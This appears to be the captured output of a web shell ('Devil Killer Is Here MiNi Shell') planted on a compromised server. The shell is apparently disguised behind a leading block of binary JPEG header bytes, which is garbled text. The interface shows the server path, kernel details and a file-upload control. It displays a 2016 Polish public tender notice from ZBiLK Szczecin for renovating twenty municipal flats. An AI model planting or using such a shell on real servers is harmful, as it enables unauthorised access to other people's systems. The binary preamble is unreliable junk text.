JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160606/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160606/70211-N-2016.html

<p class="kh_header"><b>Szczecin: Wykonanie remontu dwudziestu komunalnych lokali mieszkalnych w Szczecinie, w podziale na siedem części</b><br>
<b>Numer ogłoszenia: 70211 - 2016; data zamieszczenia: 06.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd  Budynków i Lokali  Komunalnych , ul. Mariacka 25, 70-546 Szczecin, woj. zachodniopomorskie, tel. 91 4886333, 91 4886301, faks 91 4893831, 91 4893832.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http:/WWW.ZBiLK.szczecin.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie remontu dwudziestu komunalnych lokali mieszkalnych w Szczecinie, w podziale na siedem części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie remontu dwudziestu komunalnych lokali mieszkalnych w Szczecinie, w podziale na siedem części:

1)	Część 1 zamówienia - remont lokali mieszkalnych przy ul. Grzymińskiej 22/8, 
ul. Studziennej 31/8;
2)	Część 2 zamówienia - remont lokali mieszkalnych przy ul. Mazowieckiej 1/7, 
ul. Matki Teresy z Kalkuty 4/13, ul. Mazurskiej 30a/10;
3)	Część 3 zamówienia - remont lokali mieszkalnych przy ul. Piłsudskiego 17/16, 
ul. Unisławy 4/15, Al. Wyzwolenia 79/10;
4)	Część 4 zamówienia - remont lokalu mieszkalnego przy ul. Białowieskiej 6/1B, 
ul. Grudziądzkiej 17/13, ul. Łokietka 11/32;
5)	Część 5 zamówienia - remont lokali mieszkalnych przy ul. Bogusława 14/12, 
ul. Bogusława 35/7, ul. Bogusława 38/14, ul. Krzywoustego 68/11;
6)	Część 6 zamówienia - remont lokali mieszkalnych przy ul. Bogusława 25/32, 
ul. Jagiellońskiej 26/18, ul. 5 Lipca 29/2;
7)	Część 7 zamówienia - remont lokalu mieszkalnego przy ul. Grudziądzkiej 17/5, 
ul. Karola Miarki 5/9

2.	Zakres remontu poszczególnych lokali mieszkalnych:
CZĘŚĆ 1
1)	nr 8 w budynku przy ul. Grzymińskiej 22 (powierzchnia użytkowa lokalu - 42,76 m2):
a)	branża budowlana - wymiana stolarki budowlanej, naprawa posadzki, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, przestawienie pieców kaflowych, montaż czujnika czadu, opinia kominiarska, remont wc poza lokalem,
b)	branża elektryczna - wymiana instalacji i osprzętu, tablicy, pomiary,
c)	branża sanitarna - wymiana kuchenki gazowej, ustępu, zlewozmywaka, montaż wodomierza, próba szczelności instalacji gazowej
2)	nr 8 w budynku przy ul. Studziennej 31 (powierzchnia użytkowa lokalu - 38,53 m2): 
a)	branża budowlana - wymiana stolarki budowlanej, montaż czujnika czadu, opinia kominiarska, przestawienie pieca kaflowego, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, wywóz gruzu,
b)	branża elektryczna - wymiana instalacji i osprzętu, tablic, montaż grzejników konwektorowych, akumulacyjnych, pomiary, 
c)	branża sanitarna - wymiana kuchenki gazowej, ustępu, próba instalacji gazowej, 

CZĘŚĆ 2
3)	nr 7 w budynku przy ul. Mazowieckiej 1 (powierzchnia użytkowa lokalu - 20,25 m2) 
a)	branża budowlana - naprawa posadzki, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, naprawa posadzki, wywiezienie gruzu, 
b)	branża elektryczna - wymiana instalacji i osprzętu, tablicy, pomiary, roboty uzupełniające,
c)	branża sanitarna - wymiana kuchenki gazowej, zlewozmywaka, ustępu, baterii, umywalka, montaż kabiny natryskowej, elektrycznego podgrzewacza wody, wodomierza, opinia kominiarska, próba szczelności instalacji gazowej,
4)	nr 13 w budynku przy ul. Matki Teresy z Kalkuty 4 (powierzchnia użytkowa lokalu - 68,25 m2):
a)	branża budowlana - dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, uzupełnienie listew przyściennych, remont wc poza lokalem, pomiary elektryczne, 
b)	branża sanitarna - montaż wodomierza, ustępu, próba szczelności instalacji gazowej, 

5)	nr 10 w budynku przy ul. Mazurskiej 30a (powierzchnia użytkowa lokalu - 39,47 m2):
a)	branża budowlana - wymiana stolarki drzwiowej, naprawa posadzki, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, mycie, wywóz gruzu, remont wc poza lokalem, 
b)	branża elektryczna - wymiana instalacji, osprzętu, tablicy, montaż grzejnika akumulacyjnego, konwektorowego, pomiary, 
c)	branża sanitarna - wymiana kuchenki gazowej, zlewozmywaka, ustępu, baterii, montaż podgrzewacza wody, próba szczelności instalacji gazowej, 
 
CZĘŚĆ 3:
6)	nr 16 w budynku przy ul. Piłsudskiego 17 (powierzchnia użytkowa lokalu - 52,16 m2):
a)	branża budowlana - naprawa posadzki, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, przestawienie pieca kaflowego, montaż czujnika czadu, montaż nawietrzników okiennych,  
b)	branża elektryczna - wymiana instalacji, osprzętu, tablicy, montaż grzejnika konwektorowego, pomiary, 
c)	branża sanitarna - wymiana kuchni gazowej, opinia kominiarska, wymiana zlewozmywaka, ustępu, umywalki, montaż wodomierza próba szczelności instalacji gazowej, 
 
7)	nr 15 w budynku przy ul. Unisławy 4 (powierzchnia użytkowa lokalu - 34,25 m2):
a)	branża budowlana - naprawa posadzki, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych,  dopasowanie stolarki budowlanej, mycie, wywóz gruzu, 
b)	branża elektryczna - wymiana instalacji i osprzętu, tablicy, pomiary,
c)	branża sanitarna - wymiana wanny, umywalki, zlewozmywaka, ustępu, baterii, montaż wodomierza, 

8)	nr 10 w budynku przy Al. Wyzwolenia 79 (powierzchnia użytkowa lokalu - 32,33 m2):
a)	branża budowlana - wymiana stolarki drzwiowej, naprawa posadzki, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, wywóz gruzu, 
b)	branża elektryczna - wymiana instalacji i osprzętu, tablicy, montaż grzejnika typu łazienkowego, montaż grzejnika akumulatorowego, pomiary,
c)	branża sanitarna - wymiana kuchenki gazowej, zlewozmywaka, umywalki, wanny, ustępu, baterii, montaż podgrzewacza wody, próba szczelności instalacji gazowej, opinia kominiarska, 
CZĘŚĆ 4:
9)	nr 1B w budynku przy ul. Białowieska 6 (powierzchnia użytkowa lokalu - 32,88 m2):
a)	branża budowlana - wymiana stolarki okiennej i drzwiowej, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, mycie po robotach malarskich, przestawienie pieca kaflowego, naprawa posadzki, wywóz gruzu,
b)	branża elektryczna - wymiana instalacji elektrycznej, osprzętu, tablicy, montaż grzejnika konwektorowego, pomiary,
c)	branża sanitarna - wymiana kuchenki gazowej, gazowego podgrzewacza wody, próba szczelności instalacji gazowej, wymiana baterii,  wodomierza, wanny, zlewozmywaka, ustępu, opinia kominiarska, 

10)	nr 13 w budynku przy ul. Grudziądzka 17 (powierzchnia użytkowa lokalu - 16,59 m2):
a)	branża budowlana - wymiana stolarki okiennej i drzwiowej, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, przestawienie pieca kaflowego, naprawa posadzki, mycie po robotach malarskich, wywóz gruzu,
b)	branża elektryczna - wymiana instalacji elektrycznej i osprzętu, tablicy, pomiary,
c)	branża sanitarna - wymiana baterii, wodomierza, zlewu, ustępu, próba szczelności instalacji gazowej, opinia kominiarska,

11)	nr 32 w budynku przy ul. Łokietka 11 (powierzchnia użytkowa lokalu - 20,06 m2)
a)	branża budowlana - przestawienie pieca kaflowego, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, regulacja stolarki okiennej,  wywóz gruzu,
b)	branża elektryczna - wymiana instalacji elektrycznej i osprzętu, tablicy, montaż pieca akumulacyjnego, pomiary, 
CZĘŚĆ 5:
12)	nr 12 w budynku przy ul. Bogusława 14 (powierzchnia użytkowa lokalu - 34,12 m2): 
a)	branża budowlana - wymiana stolarki okiennej, przestawienie pieca kaflowego, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, naprawa posadzki, wywóz gruzu,
b)	branża sanitarna - wymiana kuchni gazowej, montaż czujnika czadu, zlewozmywaka, ustępu, baterii, montaż wodomierza, próba instalacji gazowej,
c)	branża elektryczna - wymiana instalacji i osprzętu, tablicy, piec akumulacyjny, pomiary 

13)	nr 7 w budynku przy ul. Bogusława 35 (powierzchnia użytkowa lokalu - 37,19 m2):
a)	branża budowlana: wymiana stolarki okiennej, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, naprawa posadzki, wywóz gruzu,
b)	branża sanitarna: wymiana kuchni gazowej, baterii, montaż wodomierza, opinia kominiarska, próba instalacji gazowej,
c)	branża elektryczna: wymiana instalacji i osprzętu, grzałek w piecach kaflowych, grzejnika drabinkowego, pomiary

14)	nr 14 w budynku przy ul. Bogusława 38 (powierzchnia użytkowa lokalu - 43,50 m2):
a)	branża budowlana: wymiana stolarki okiennej i drzwiowej, przestawienie pieca kaflowego, naprawa posadzki, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, wywóz gruzu,
b)	branża sanitarna: wymiana kuchni gazowej, montaż czujnika czadu, montaż zlewozmywaka, wanny, ustępu, baterii, montaż wodomierza, próba instalacji gazowej,
c)	branża elektryczna: wymiana instalacji i osprzętu, tablicy, pomiary

15)	nr 11 w budynku przy ul. Krzywoustego 68 (powierzchnia użytkowa lokalu - 7,38 m2):
a)	branża budowlana: wymiana stolarki okiennej, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, wywóz gruzu
b)	branża sanitarna: wymiana zlewozmywaka, montaż wodomierza
c)	branża elektryczna: wymiana instalacji i osprzętu, wymiana tablicy, kuchenki elektrycznej dwu palnikowej, pieca akumulacyjnego, pomiary.

CZĘŚĆ 6:
16)	nr 32 w budynku przy ul. Bogusława 25 (powierzchnia użytkowa lokalu -  27,65 m2):
a)	branża budowlana - wymiana stolarki okiennej, przestawienie pieca kaflowego, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych,  
b)	branża elektryczna - wymiana instalacji i osprzętu, wlz, tablicy, pomiary,
c)	branża sanitarna - wymiana kuchenki gazowej, ustępu, zlewozmywaka, montaż czujnika czadu, wodomierza, próba szczelności instalacji gazowej, 
 
17)	nr 18 w budynku przy ul. Jagiellońskiej 26 (powierzchnia użytkowa lokalu - 26,18 m2):
a)	branża budowlana - wymiana stolarki drzwiowej, roboty tynkarskie, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, naprawa posadzki, wywóz gruzu,
b)	branża elektryczna - wymiana instalacji i osprzętu, wlz, pomiary,
c)	branża sanitarna - wymiana kuchenki gazowej, kotła gazowego, ustępu, zlewozmywaka, baterii, montaż czujnika czadu, wkładu kominiarskiego, próba szczelności instalacji gazowej, opinia kominiarska,

18)	nr 2 w budynku przy ul. 5 Lipca 29 (powierzchnia użytkowa lokalu - 34,55 m2)
c)	branża budowlana - wymiana stolarki budowlanej, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, przestawienie pieca kaflowego, naprawa posadzki, opinia kominiarska, wywóz gruzu,
d)	branża elektryczna - wymiana instalacji i osprzętu, tablicy, montaż grzejnika konwektorowego, pomiary, 
e)	branża sanitarna - wymiana kuchenki gazowej, baterii, zlewozmywaka, ustępu, próba, montaż grzejnika gazowego wody przepływowej,  szczelności instalacji gazowej, 

CZĘŚĆ 7:
19)	nr 5 w budynku przy ul. Grudziądzkiej 17 (powierzchnia użytkowa lokalu - 16,59 m2):
a)	branża budowlana - wymiana stolarki okiennej i drzwiowej, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, naprawa posadzki, mycie, wywóz gruzu, 
b)	branża elektryczna - wymiana instalacji i osprzętu, tablicy, wlz, pomiary,
c)	branża sanitarna - wymiana, ustępu, zlewozmywaka, baterii, montaż wodomierza, próba szczelności instalacji gazowej, opinia kominiarska

20)	nr 9 w budynku przy ul. Karola Miarki 5 (powierzchnia użytkowa lokalu - 38,92 m2):
a)	branża budowlana - wymiana stolarki okiennej i drzwiowej, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, licowanie ścian płytkami, naprawa posadzki, mycie, wywóz gruzu, 
b)	branża elektryczna - wymiana instalacji i osprzętu, tablicy, pomiary,
c)	branża sanitarna - wymiana kuchenki gazowej, baterii, ustępu, zlewozmywaka, montaż kotła gazowego, grzejnikach stalowych, próba szczelności instalacji gazowej, opinia kominiarska.

3.	Podane w załącznikach do siwz nazwy własne są przykładowe. Dopuszcza się materiały i urządzenia równoważne w stosunku do przywołanych. Materiały i urządzenia równoważne zgodnie ze swoją definicją, muszą posiadać parametry takie same lub lepsze niż wskazane przykładowo w specyfikacji technicznej wykonania i odbioru robót budowlanych. W takim przypadku, wykonawca zobowiązany jest dołączyć do oferty dokument, o którym mowa w Rozdziale V ust. 8 siwz
4.	Przedmiot zamówienia należy wykonać zgodnie ze Specyfikacją Techniczną Wykonania i Odbioru Robót Budowlanych, warunkami technicznymi oraz sztuką budowlaną. Roboty należy prowadzić zgodnie z obowiązującymi przepisami bezpieczeństwa i higieny pracy przy wykonywaniu robót budowlanych i przepisami p.poż.
5.	Wykonawca jest wytwarzającym odpady w rozumieniu przepisów ustawy o odpadach z dnia 14 grudnia 2012 r. (Dz. U. z 2013 r., poz. 21). Wykonawca w trakcie realizacji przedmiotu zamówienia ma obowiązek w pierwszej kolejności poddania odpadów budowlanych (odpadów betonowych, ziemi gruzu budowlanego) odzyskowi, a jeżeli z przyczyn technologicznych jest on niemożliwy lub nieuzasadniony z przyczyn ekologicznych lub ekonomicznych, to Wykonawca zobowiązany jest do przekazania powstałych odpadów do unieszkodliwienia. Wykonawca zobowiązany jest udokumentować Zamawiającemu sposób gospodarowania tymi odpadami (utylizacja, wywóz gruzu itp.) jako warunek dokonania odbioru końcowego realizowanego zamówienia.


Uwaga: Zamawiający dopuszcza składanie ofert częściowych. Wykonawca może złożyć ofertę na jedną lub dwie części zamówienia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.41-1, 45.45.30.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 80.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wadium należy wnieść w wysokości:
1)	dla Części 1 zamówienia (ul. Grzymińska 22/8, ul. Studzienna 31/8- 1 006,00 zł (słownie: jeden tysiąc sześć złotych),
2)	dla Części 2 zamówienia (ul. Mazowiecka1/7, ul. Matki Teresy z Kalkuty 4/13, 
ul. Mazurskiej 30a/10) - 731,00 zł (słownie: siedemset trzydzieści jeden złotych),
3)	dla Części 3 zamówienia (ul. Piłsudskiego 17/16, ul. Unisławy 4/15, Al. Wyzwolenia 79/10) - 1 235,00 zł (słownie: jeden tysiąc dwieście trzydzieści pięć złotych),
4)	dla Części 4 zamówienia (ul. Białowieska 6/1B, ul. Grudziądzka 17/13, ul. Łokietka 11/3 - 993,00 zł (słownie: dziewięćset dziewięćdziesiąt trzy złote),
5)	dla Części 5 zamówienia (ul. Bogusława 14/12, ul. Bogusława 35/7, ul. Bogusława 38/14, ul. Krzywoustego 68/11) - 1 379,00 zł (słownie: jeden tysiąc trzysta siedemdziesiąt dziewięć złotych),
6)	dla Części 6 zamówienia (ul. Bogusława 25/32, ul. Jagiellońska 26/18, ul. 5 Lipca 29/2) - 1 333,00 zł (słownie: jeden tysiąc trzysta trzydzieści trzy złote),
7)	dla Części 7 zamówienia (ul. Grudziądzka 17/5, ul. Karola Miarki 5/9) - 971,00 zł (słownie: dziewięćset siedemdziesiąt jeden złotych),
w terminie do dnia        06.2016 r. do godziny 900. Decyduje data wpływu środków do zamawiającego.
2.	Wadium może być wnoszone:
1)	w pieniądzu - przelewem na konto w PKOBP nr 36 1020 4795 0000 9302 0292 7648, 
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej (z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym), gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2) ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
Dokumenty, o których mowa w pkt 2 należy zdeponować w siedzibie ZBiLK przy ul. Mariackiej 25, pokój nr 12, przed upływem terminu składania ofert</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że wykonał  należycie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum jedną najważniejszą robotę budowlaną. Za jedną najważniejszą robotę budowlaną zamawiający uzna, wykonanie remontu minimum jednego lokalu we wszystkich branżach.

Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej jedną osobą, posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie w zakresie kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej.

UWAGA:
Na podstawie art. 104 ustawy z dnia 7 lipca 1994 roku Prawo budowlane (t.j. Dz. U. z 2016 r., poz. 290) osoby, które, przed dniem wejścia w życie ustawy, uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie, zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie. Zakres uprawnień budowlanych należy odczytywać zgodnie z treścią decyzji o ich nadaniu i w oparciu o przepisy będące podstawą ich nadania. Ponadto, zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy Prawo budowlane, mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych

Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
